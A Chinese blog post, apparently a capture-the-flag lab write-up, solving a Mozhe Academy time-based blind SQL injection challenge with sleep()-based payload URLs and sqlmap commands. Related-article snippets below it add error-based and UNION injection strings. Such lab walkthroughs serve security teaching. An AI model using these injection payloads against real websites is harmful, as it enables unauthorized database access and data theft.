墨者学院——SQL注入漏洞测试(时间盲注)

最新推荐文章于 2025-04-02 21:02:38 发布
最新推荐文章于 2025-04-02 21:02:38 发布
阅读量800 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74093152/article/details/129987390
版权

点击链接进入题目

点进网页,在url后加?type=1',发现没有回显

 上传?type=1 and sleep(10),发现网页有明显延迟,说明sleep函数被执行,该网页存在时间注入

 通过构造payload去获得数据库长度,x为猜想的数据库长度。

http://124.70.71.251:43431/flag.php?type=1%20and%20if(length(database())=x,sleep(5),1)%20--

测试发现当database=12时网页出现延迟,发生时间注入,说明数据库的长度为12

然后进行猜解数据库名

http://ip/flag.php?type=1 and if(ascii(substr(database(),1,1))=112,sleep(5),1) --+

一个个猜解会很慢,可以使用sqlmap去跑数据库名python sqlmap.py -u "url" --dbs

 接下来猜解表

1、猜解表的长度

http://ip/flag.php?type=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,sleep(5),1) --

2、猜解表名

http://219.153.49.228:40472/flag.php?type=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 2,1),1,1))=102,sleep(5),1) --

可以发现当第一个字母的ASCII码为102时,即为字符‘f’时,发现有延迟,即该表的第一个字母是‘f’

以此类推猜出长度为4的表名

也可以直接用sqlmap跑出表名python sqlmap.py -u

 得到表名后,我们需要获取表中的数据

1、猜解数据长度

http://ip/flag.php?type=1 and if(length((select flag from flag limit 0,1))=6,sleep(4),1)--

当猜想数据长度为6的时候有延迟,说明该数据的长度为6

2、猜解数据内容

http://ip/flag.php?type=1 and if(ascii(substr((select flag from flag limit 0,1),1))=109,sleep(4),1)--

以此类推可以猜得该长度为6的数据内容为mozhe1

用sqlmap跑会很方便

最终获得flag。

韦韦韦www
关注
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 876
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 542
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院SQL注入漏洞测试(时间盲注)
ST0new的博客
06-11 3228
目标 了解SQL时间盲注 掌握SQL注入语法 掌握SQL注入原理 了解SQL注入常用注释字符 本题使用的工具 sqlmap,hackbar 环境 物理机:windows10 虚拟机:kali 时间盲注 1 判断是否存在盲注 可以发现判断有多种方式,只要能保证sleep()执行,就可以根据回显的时间判断是否存在时间注入 命令1 :http:/ip/flag.php?type=1 and sl...
如何利用sqlmap来进行盲注?2025.4最新
最新发布
2503_91447102的博客
04-02 333
SQL 盲注是指在目标应用程序没有明确返回 SQL 查询结果的情况下,通过构造特殊的 SQL 语句并根据应用程序的响应(如页面响应时间、返回页面的内容是否变化等)来推断数据库信息。以下是使用sqlmap
墨者SQL注入漏洞测试(时间盲注)题解
zr1213159840的博客
12-12 1104
解法一:剑走偏锋 首先我们拿到网址后,第一个事就是加上type后测试下 好小子,竟然回显?那我就不客气了 直接看下数据库 爆表 type=group_concat(table_name) from information_schema.tables where table_schema=‘pentesterlab’–+ 爆表中的列,先测试下user type=group_concat(column) from information_schema.columns where table_name=‘f
墨者学院SQL注入漏洞测试(时间盲注)爆破:
weixin_54105551的博客
06-30 599
本文是关于墨者学院sql注入时间盲注爆破的过程
墨者学院SQL注入时间盲注
weixin_45819911的博客
07-16 1091
墨者学院SQL注入时间盲注)(手动注入+sqlmap+对于注入语句中的那个 ’ 的测试) 闲谈 这样写标题比较醒目,主要是想帮帮像我一样的强迫症的小伙伴,(其实我发现是在线靶场的解题思路啥的看的人多,如果有小伙伴对于我的推测有不同见解的地方可以留言),因为我最近在刷墨者靶场的SQL注入部分,所以遇到自己觉得有意思的题会发出来,小伙白也可以留言告诉我一些有意思的靶场(这是属于小白的进阶之路)。 0x00 注入点判断: 提示很明显,如图0: 图0 提示很明显是参数?type= 画风正常一点的payload
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5288
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 798
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
0x32.SQL注入漏洞测试(时间盲注)
qq_31679787的博客
11-18 301
可以直接在type参数后加flag,发现就能得到数据mozhe1,验证后得到key; 也可以通过测试发现存在延时注入sqlmap爆数据库; 爆表名; 爆列名; 爆数据; 验证后得到key; ...
SQL注入漏洞测试(时间盲注)
weixin_47493074的博客
09-28 342
SQL注入漏洞测试(时间盲注)
SQL注入漏洞扫描检测
12-20
SQL注入检测的全套代码和论文介绍,C#,Web应用漏洞检测技术,是一种针对web应用的积极防御技术。该技术在应用尚未遭受攻击前,模拟黑客攻击的方式对目标系统进行各种探测,发现系统潜在的漏洞。由于web应用工作在HTTP应用层协议上,所以传统的防火墙、IDS等网络层防护设备不能对其进行保护,此时就需要web应用漏洞检测工具对系统的应用层进行保护,二者互补不足,共同保护web系统的安全
刷题笔记:SQL注入漏洞测试(时间盲注)
m0_67399862的博客
05-21 452
无法利用页面来判断SQL注入是否能正确注入,所以考虑用时间盲注
墨者SQL注入漏洞测试(时间盲注)
wswr的博客
03-17 552
思路:我按照题目说的时间盲注试了一下我sleep(),好像没什么反应,然后试了if(1=2,1,sleep(5))好像也没啥反应,然后叭,我就试了一下单引号,发现了注入页面,而且发现了数据和我写入的单引号闭合且执行了,好像我就发现了不用时间注入的方式就能解题,所以本人偷懒了,快速老方法解题。 总结:按道理来说应该掌握时间盲注注入方式,但其实原理我还是懂的,那既然发现更轻松的方式,就按更轻松的方式解决,当然直接用sqlmap也不是不可以,但是需要知道原理才是这题的目的 原理:暴力猜,库,表,列,值,我感
刷题笔记:SQL注入漏洞测试(时间盲注)(2)
m0_67399862的博客
05-21 236
根据提示用?type=的语句 发现有回显信息,尝试利用回显信息进行爆库 可得知数据库的名称为pentesterlab 利用?type=(select group_concat(table_name) from information_schema.tables where table_schema=database())'语句 可得表名分别为comment、flag、goods、user 用?type=(select group_concat(column_name) fr...
php 延时注入测试,墨者 - SQL注入漏洞测试(时间盲注)
weixin_34553861的博客
03-23 272
按照题意,正规思路flag.php?type=1%20and%20if(length(database())=12,sleep(5),1)%20--+通告sleep()函数判断数据长度 然后用flag.php?type=1%20and%20if(substr(database(),1,1)='s',sleep(5),1)%20--+用bp字典结合substr函数爆库==>爆表==>爆字...
sql时间盲注)——墨者学院——漏洞操作记录
chick11的博客
07-16 285
Sql时间盲注 1、 开始的页面,但是不是这个页面,点击下面的任性网页 2、提示再url中传参,加个逗号 ?type=1’ 既然提示是时间盲注,那就 ?type=1’ and sleep(5)%23 没有时间延迟 去掉单引号 有时间延迟5秒 因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap 这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段 import requests import datetime i
sql漏洞注入——时间注入
m0_73756016的博客
11-01 1824
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
墨者学院mysql布尔注入
01-25
### 关于MySQL布尔注入的基础概念 布尔型SQL注入是一种通过向应用程序发送特定构造的输入并观察其响应来推断数据库结构的技术。这种技术依赖于程序返回的不同页面内容或HTTP状态码,以此判断条件表达式的真假[^1]。 ### 利用手工方法执行布尔盲注的过程 当面对一个可能存在SQL注入漏洞的应用时,在未提供错误消息的情况下,可以通过改变查询参数中的逻辑条件来进行试探。例如: ```sql id=1 AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1),1,1))=48; ``` 上述语句尝试获取当前数据库下的第一个表名的第一个字符ASCII值是否等于`48`(即字符'0')。如果网页正常显示,则表示该位置上的字符确实为‘0’;反之则不是。接着可以调整比较数值继续猜测其他可能存在的字符直至整个字符串被还原出来[^2]。 ### 使用自动化工具辅助布尔盲注实验 对于较为复杂的场景下手动操作效率较低的情况,Burp Suite这样的中间人代理软件能够帮助快速定位到敏感数据。设置好相应的payload模板之后就可以让工具自动遍历所有可能性从而大大节省时间和精力。比如利用Intruder模块配置如下Payloads: - `and (select substr(user(),{POSITION},1)={CHAR})` 其中`{POSITION}`代表要读取的目标字符串的位置索引而`{CHAR}`则是待验证的具体字符编码。 ### 获取指定模式内的表格名称列表实例 为了进一步探索目标站点背后的架构设计,还可以借助联合查询的方式提取更多有用的信息。下面给出了一条用于枚举名为`mozhe_Discuz_StormGroup`的数据集内全部表单标题的例子: ```sql UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema='mozhe_Discuz_StormGroup'; ``` 此命令会把符合条件的结果拼接成一行输出给攻击者查看[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值